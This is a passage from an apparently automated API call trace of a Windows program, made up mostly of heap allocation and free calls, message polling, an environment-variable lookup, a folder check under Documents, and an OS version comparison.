out: hHeap=0x25c0000) returned 1 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0263.053] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0263.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.054] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0263.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.055] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Kji1x-v4FT0kOOxbY6", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe951730, ftCreationTime.dwHighDateTime=0x1d4cca9, ftLastAccessTime.dwLowDateTime=0xc395e470, ftLastAccessTime.dwHighDateTime=0x1d4c718, ftLastWriteTime.dwLowDateTime=0xc395e470, ftLastWriteTime.dwHighDateTime=0x1d4c718, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x99e0047, dwReserved1=0x2540a, cFileName="Kji1x-v4FT0kOOxbY6", cAlternateFileName="KJI1X-~1")) returned 0xaa5760 [0263.055] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0263.055] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.055] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.055] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.055] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.056] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.056] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.056] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.056] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.056] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.056] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.056] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.057] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.057] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0263.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.057] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0263.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.058] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0263.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.058] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.058] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.059] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0263.061] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.061] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0263.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.062] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0263.062] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0263.062] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.068] HeapFree (in: 